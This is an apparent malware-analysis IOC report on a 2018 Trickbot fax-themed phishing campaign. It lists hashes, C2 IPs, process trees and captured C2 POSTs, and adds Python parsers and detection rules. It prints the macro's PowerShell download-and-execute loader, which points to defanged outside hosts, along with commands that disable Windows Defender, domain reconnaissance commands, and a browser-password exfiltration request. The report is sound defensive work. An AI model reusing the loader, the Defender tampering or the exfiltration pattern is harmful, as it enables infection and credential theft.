- #IOC #OptiData #VR #Trickbot #W97M #macro #powershell
- https://pastebin.com/75KNqwCf
- https://radetskiy.wordpress.com/?s=trickbot
- https://myonlinesecurity.co.uk/trickbot-via-new-fax-message-malspam/
- scheme
- --------------
- email > attach (doc) > macro > powershell > GET (one of 2 URLs, second is the fallback) > \AppData\Local\Temp\which.exe
- email_headers
- --------------
- Received: from confidentialfax.com ([95.211.242.199])
- by mail1.victim.com for <user1@org1.victim.com>;
- Fri, 5 Oct 2018 13:45:12 +0300 (EEST) (envelope-from noreply-user1=org1.victim.com@confidentialfax.com)
- Received: by confidentialfax.com id hmt0jtcpsj86 for <user1@org1.victim.com>;
- Fri, 5 Oct 2018 06:29:00 -0400 (envelope-from <noreply-user1=org1.victim.com@confidentialfax.com>)
- Subject: New fax message
- From: "Confidential Fax" <noreply@confidentialfax.com>
- Date: Fri, 5 Oct 2018 06:29:00 -0400
- To: user1@org1.victim.com
- files
- --------------
- SHA-256 03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2
- File name Fax.doc
- File size 63 KB
- SHA-256 b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a
- File name ch.rome !This program cannot be run in DOS mode.
- File size 557.3 KB
- SHA-256 6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c
- File name radiance.png !This program cannot be run in DOS mode.
- File size 492 KB
- SHA-256 3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22
- File name table.png !This program cannot be run in DOS mode.
- File size 492 KB
- macro
- --------------
- powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''C:\Users\admin\AppData\Local\Temp\which.exe'');start-process ''C:\Users\admin\AppData\Local\Temp\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\symbol.bat; start-process 'C:\Users\admin\AppData\Local\Temp\symbol.bat' -windowstyle hidden"
- payload_sources
- --------------
- 107.180.51.22 pixandflix{.} com/ch.rome
- 107.180.51.22 wedannouncements{.} com/ch.rome
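- Added triage helper (my code, not part of the paste): pulls the two download URLs, the drop path and the staging .bat out of the macro's PowerShell one-liner above, and lists the string indicators a detection rule could key on. The command line embedded below is a copy of the macro line from this paste, still defanged in the paste's own `h11p: \` / `{.} ` notation, which refang() reverses; the function and rule names are mine.

```python
import re

# Copy of the defanged one-liner from the "macro" section above (constructed from the paste).
MACRO_CMD = (
    "powershell \"'powershell \"\"function need([string] $qqqqq)"
    "{(new-object system.net.webclient).downloadfile($qqqqq,"
    "''C:\\Users\\admin\\AppData\\Local\\Temp\\which.exe'');"
    "start-process ''C:\\Users\\admin\\AppData\\Local\\Temp\\which.exe'';}"
    "try{need(''h11p: \\pixandflix{.} com/ch.rome'')}"
    "catch{need(''h11p: \\wedannouncements{.} com/ch.rome'')}'\"\""
    " | out-file -encoding ascii -filepath C:\\Users\\admin\\AppData\\Local\\Temp\\symbol.bat;"
    " start-process 'C:\\Users\\admin\\AppData\\Local\\Temp\\symbol.bat' -windowstyle hidden\""
)


def refang(s):
    """Undo the paste's defanging so the URL can be looked up: 'h11p: \\x{.} com' -> 'http://x.com'."""
    s = s.replace("h11p: \\", "http://").replace("hxxp://", "http://")
    return s.replace("{.} ", ".").replace("{.}", ".").replace("[.]", ".")


def parse_loader(cmd):
    """Extract URLs, dropped EXE and staging .bat from the one-liner.

    The inner script is a single-quoted PowerShell string, so every literal inside it
    is wrapped in doubled single quotes (''...''); the regexes key on that."""
    urls = [refang(u) for u in re.findall(r"need\(''(.+?)''\)", cmd)]
    drop = re.search(r"downloadfile\(\$\w+,''(.+?)''\)", cmd)
    bat = re.search(r"-filepath\s+(\S+)", cmd)
    return {
        "primary_url": urls[0] if urls else None,
        "fallback_url": urls[1] if len(urls) > 1 else None,   # used only if the first GET throws
        "dropped_exe": drop.group(1) if drop else None,
        "staging_bat": bat.group(1).rstrip(";") if bat else None,
        "hidden_window": "-windowstyle hidden" in cmd.lower(),
    }


def loader_indicators(cmd):
    """Cheap substring/regex checks that together describe this loader pattern."""
    c = cmd.lower()
    checks = {
        "webclient_downloadfile": "system.net.webclient" in c and ".downloadfile(" in c,
        "start_process": "start-process" in c,
        "bat_staged_in_temp": bool(re.search(r"out-file[^|]*\\temp\\[^\s;]*\.bat", c)),
        "hidden_window": "-windowstyle hidden" in c,
        "try_catch_fallback": "try{" in c and "catch{" in c,
    }
    return sorted(k for k, v in checks.items() if v)


if __name__ == "__main__":
    for k, v in parse_loader(MACRO_CMD).items():
        print(f"{k:14} {v}")
    print(loader_indicators(MACRO_CMD))
```

- The single indicators are noisy on their own (plenty of admin scripts call DownloadFile); the combination of WebClient download, start-process on a file under %TEMP%, a .bat written with out-file and a hidden window, all launched from WINWORD.EXE, is what makes the rule precise.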
- activity
- **************
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"
- C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "
- "C:\tmp\which.exe"
- C:\Windows\SysWOW64\cmd.exe
- /c sc stop WinDefend
- /c sc delete WinDefend
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Users\operator\AppData\Roaming\AMNI\which.exe
- C:\Windows\SysWOW64\cmd.exe
- /c sc stop WinDefend
- /c sc delete WinDefend
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- C:\Windows\system32\cmd.exe
- /c ipconfig /all
- /c net config workstation
- /c net view /all
- /c net view /all /domain
- /c nltest /domain_trusts
- /c nltest /domain_trusts /all_trusts
- C:\Windows\system32\svchost.exe
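- Added detection example (my code, not part of the paste): the process chain above expressed as rules over process-creation events. The events embedded below are constructed from the "proc" section; the parent/child links are my reading of that tree (the paste only lists the commands), the command lines of the long PowerShell step are abbreviated, and the trailing svchost line is a constructed benign event to show the rules stay quiet on it.

```python
import re
from collections import defaultdict, namedtuple

Event = namedtuple("Event", "parent image cmdline")

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Host/domain discovery commands seen in the proc section above.
RECON = [r"ipconfig\s+/all", r"net\s+config\s+workstation", r"net\s+view\s+/all",
         r"nltest\s+/domain_trusts"]

# Constructed from the "proc" section; parent links are assumed, not recorded in the paste.
EVENTS = [
    Event("explorer.exe", "WINWORD.EXE",
          r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde'),
    Event("WINWORD.EXE", "cmd.exe",   # abbreviated copy of the macro's one-liner
          r'C:\Windows\SysWOW64\cmd.exe /c powershell "(new-object system.net.webclient)'
          r'.downloadfile($qqqqq,%tmp%\which.exe);start-process %tmp%\which.exe"'
          r' | out-file -filepath %tmp%\symbol.bat; start-process %tmp%\symbol.bat -windowstyle hidden'),
    Event("cmd.exe", "cmd.exe", r'C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "'),
    Event("cmd.exe", "which.exe", r'"C:\tmp\which.exe"'),
    Event("which.exe", "cmd.exe", r'C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend'),
    Event("which.exe", "cmd.exe", r'C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend'),
    Event("which.exe", "cmd.exe",
          r'C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true'),
    Event("which.exe", "which.exe", r'C:\Users\operator\AppData\Roaming\AMNI\which.exe'),
    Event("svchost.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /c ipconfig /all'),
    Event("svchost.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /c net config workstation'),
    Event("svchost.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /c net view /all'),
    Event("svchost.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /c net view /all /domain'),
    Event("svchost.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /c nltest /domain_trusts'),
    Event("svchost.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts'),
    Event("services.exe", "svchost.exe", r'C:\Windows\system32\svchost.exe -k netsvcs'),  # constructed benign
]


def office_spawns_shell(e):
    return e.parent.lower() in OFFICE and e.image.lower() in SHELLS


def ps_download_and_run(e):
    c = e.cmdline.lower()
    return "downloadfile(" in c and "start-process" in c


def defender_tamper(e):
    c = e.cmdline.lower()
    return bool(re.search(r"\bsc\s+(stop|delete)\s+windefend\b", c)
                or re.search(r"set-mppreference.*-disablerealtimemonitoring\s+\$true", c))


def user_writable_exec(e):
    """Image launched from C:\\tmp or the user's AppData (where which.exe lands here)."""
    return bool(re.match(r'^"?(?:c:\\tmp\\|c:\\users\\[^\\]+\\appdata\\)', e.cmdline.lower()))


RULES = [("office_spawns_shell", office_spawns_shell), ("ps_download_and_run", ps_download_and_run),
         ("defender_tamper", defender_tamper), ("user_writable_exec", user_writable_exec)]


def evaluate(events):
    """Return (rule, image, cmdline) for every event that trips a rule."""
    return [(name, e.image, e.cmdline) for e in events for name, fn in RULES if fn(e)]


def recon_bursts(events, threshold=3):
    """Parents that ran >= threshold distinct discovery commands (the post-infection recon above)."""
    seen = defaultdict(set)
    for e in events:
        for pat in RECON:
            if re.search(pat, e.cmdline, re.I):
                seen[e.parent].add(pat)
    return {p: len(s) for p, s in seen.items() if len(s) >= threshold}


if __name__ == "__main__":
    for hit in evaluate(EVENTS):
        print(hit)
    print("recon bursts:", recon_bursts(EVENTS))
```

- The recon rule counts distinct command families per parent rather than matching single commands, because `ipconfig /all` or `net view` alone is routine; six of them in a row from one parent within seconds is the Trickbot systeminfo/network module at work.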
- netwrk
- --------------
- 107.180.51.22 pixandflix.com GET /ch.rome HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
- 185.17.123.2 185.17.123.2 GET /radiance.png HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
- 185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
- 185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/90 HTTP/1.1 test
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 1568 107.180.51.22 80 ESTABLISHED
- svchost.exe 2976 47.52.62.55 443 ESTABLISHED
- svchost.exe 2976 192.252.209.44 443 ESTABLISHED
- svchost.exe 2976 2.21.89.57 80 ESTABLISHED
- svchost.exe 2976 82.146.41.218 447 ESTABLISHED
- svchost.exe 3136 200.29.24.36 8082 SYN_SENT
- svchost.exe 3384 185.17.123.2 80 ESTABLISHED
- svchost.exe 3136 24.130.135.200 80 SYN_SENT
- svchost.exe 420 77.37.142.203 8082 SYN_SENT
- svchost.exe 3136 177.0.69.68 80 SYN_SENT
- svchost.exe 3136 107.175.247.166 443 SYN_SENT
- svchost.exe 3136 172.81.135.139 443 SYN_SENT
- svchost.exe 3136 200.29.24.36 8082 SYN_SENT
- persist
- --------------
- Task Scheduler
- \Msnetcs c:\users\operator\appdata\roaming\amni\which.exe 05.10.2018 10:59
- stealing_passwd
- **************
- POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/4.0
- Host: 37.128.229.30
- -----------DEAFJJDLMELQCBHP
- Content-Disposition: form-data; name="data"
- http://www.i.ua|oper|****** (saved passwd)
- https://www.ukr.net|11oper|****** (saved passwd)
- https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)
- https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)
- -----------DEAFJJDLMELQCBHP
- Content-Disposition: form-data; name="source"
- firefox passwords
- -----------DEAFJJDLMELQCBHP--
- (!) Firefox saved passwords only, no Chrome
- get_sys_info
- **************
- POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1
- Content-Type: multipart/form-data; boundary=Arasfjasu7
- User-Agent: test
- Host: 37.128.229.30
- --Arasfjasu7
- Content-Disposition: form-data; name="proclist"
- ***PROCESS LIST***
- [System Process]
- System
- smss.exe
- csrss.exe
- wininit.exe
- csrss.exe
- winlogon.exe
- . . .
- --Arasfjasu7
- Content-Disposition: form-data; name="sysinfo"
- ***SYSTEMINFO***
- Host Name - APM11
- OS Name - Microsoft Windows 7 ..........................
- OS Version - Service Pack 1
- OS Architecture - 64-bit
- Product Type - Workstation
- Build Type - Multiprocessor Free
- Registered Owner - operator
- Registered Organization -
- . . .
- /c ipconfig /all
- /c net config workstation
- /c net view /all
- /c net view /all /domain
- /c nltest /domain_trusts
- /c nltest /domain_trusts /all_trusts
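- Added parser (my code, not part of the paste) for the two C2 POSTs above: it splits the URI into group tag, victim hostname, OS tag, client id and command code, reads the multipart body, and strips the password field from the /81/ credential lines. The requests embedded below are rebuilt from the two captures (passwords stay masked as on the page, the /90 body keeps only the lines shown); the Content-Type header of the /81/ request is an assumption, since the paste shows only its delimiter lines, and the 81/90 labels come from what those bodies carried here, not from any Trickbot documentation.

```python
import re

# C2 path shape seen above: /<group tag>/<HOSTNAME>_<OS tag>.<client id>/<command>/
URI_RE = re.compile(
    r"^/(?P<gtag>[^/]+)/(?P<host>[^_/]+)_(?P<ostag>W\d+)\.(?P<cid>[^/]+)/(?P<cmd>\d+)/?$")
# Labels taken only from the bodies captured on this page.
CMD_LABELS = {"81": "saved browser passwords", "90": "system info + process list"}

# Constructed from the captures above; /81/ Content-Type header is an assumption.
POST_81 = "\r\n".join([
    "POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1", "Accept: */*",
    "Content-Type: multipart/form-data; boundary=---------DEAFJJDLMELQCBHP",
    "User-Agent: Mozilla/4.0", "Host: 37.128.229.30", "",
    "-----------DEAFJJDLMELQCBHP", 'Content-Disposition: form-data; name="data"', "",
    "http://www.i.ua|oper|****** (saved passwd)",
    "https://www.ukr.net|11oper|****** (saved passwd)",
    "https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)",
    "https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)",
    "-----------DEAFJJDLMELQCBHP", 'Content-Disposition: form-data; name="source"', "",
    "firefox passwords", "-----------DEAFJJDLMELQCBHP--", ""])
POST_90 = "\r\n".join([
    "POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1",
    "Content-Type: multipart/form-data; boundary=Arasfjasu7",
    "User-Agent: test", "Host: 37.128.229.30", "",
    "--Arasfjasu7", 'Content-Disposition: form-data; name="proclist"', "",
    "***PROCESS LIST***", "[System Process]", "System", "smss.exe", "csrss.exe",
    "--Arasfjasu7", 'Content-Disposition: form-data; name="sysinfo"', "",
    "***SYSTEMINFO***", "Host Name - APM11", "OS Version - Service Pack 1",
    "OS Architecture - 64-bit", "Registered Owner - operator",
    "--Arasfjasu7--", ""])


def parse_c2_uri(uri):
    """Split the path into its fields; anything not matching the shape is reported as such."""
    m = URI_RE.match(uri)
    if not m:
        return {"uri": uri, "is_trickbot_shape": False}
    d = m.groupdict()
    d.update(uri=uri, is_trickbot_shape=True, label=CMD_LABELS.get(d["cmd"], "unknown"))
    # ASSUMPTION: OS tag is W<major><minor><build> with one-digit major/minor, so
    # W617601 -> 6.1.7601, which agrees with the Windows 7 SP1 sysinfo posted above.
    t = d["ostag"][1:]
    d["os_version"] = f"{t[0]}.{t[1]}.{t[2:]}" if len(t) > 2 else t
    return d


def parse_multipart(body, boundary):
    """Minimal multipart/form-data reader: returns {field name: raw value}."""
    parts = {}
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":          # preamble / closing delimiter
            continue
        pieces = re.split(r"\r?\n\r?\n", chunk, maxsplit=1)   # part headers / part value
        if len(pieces) != 2:
            continue
        name = re.search(r'name="([^"]+)"', pieces[0])
        if name:
            parts[name.group(1)] = pieces[1]
    return parts


def parse_post(raw):
    """Request line + headers + multipart body -> one flat record for triage."""
    head, body = re.split(r"\r?\n\r?\n", raw, maxsplit=1)
    lines = head.splitlines()
    method, uri, _version = lines[0].split()
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    m = re.search(r"boundary=(\S+)", headers.get("content-type", ""))
    rec = parse_c2_uri(uri)
    rec.update(method=method, user_agent=headers.get("user-agent"), c2_host=headers.get("host"),
               parts=parse_multipart(body, m.group(1)) if m else {})
    return rec


def parse_credentials(data):
    """Each line of the /81/ 'data' field is url|user|password...; keep only site and user."""
    creds = []
    for line in data.splitlines():
        f = line.split("|")
        if len(f) >= 3:
            creds.append((f[0].strip(), f[1].strip()))
    return creds


if __name__ == "__main__":
    for raw in (POST_81, POST_90):
        r = parse_post(raw)
        print(r["host"], r["os_version"], r["cmd"], r["label"], r["user_agent"], list(r["parts"]))
    print(parse_credentials(parse_post(POST_81)["parts"]["data"]))
```

- Two things worth keying detections on from this parse: the POST path ends in a bare numeric command code with the hostname and OS tag embedded in the second segment, and the User-Agent changes per module ("Mozilla/4.0" for the password grab, "test" for sysinfo), neither of which a browser would ever send.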
- # # #
- https://www.virustotal.com/#/file/03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2/community
- https://www.virustotal.com/#/file/b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a/community
- https://www.virustotal.com/#/file/6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c/detection
- https://www.virustotal.com/#/file/3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22/detection
- https://analyze.intezer.com/#/analyses/0a02c369-9b18-4711-ba78-cb38aaed2184
- https://analyze.intezer.com/#/analyses/d2aea4cc-8c6c-4f60-80e1-e946b5f14f64
- https://analyze.intezer.com/#/analyses/7f767ab6-9865-441e-a9de-9bdd7c4c6bff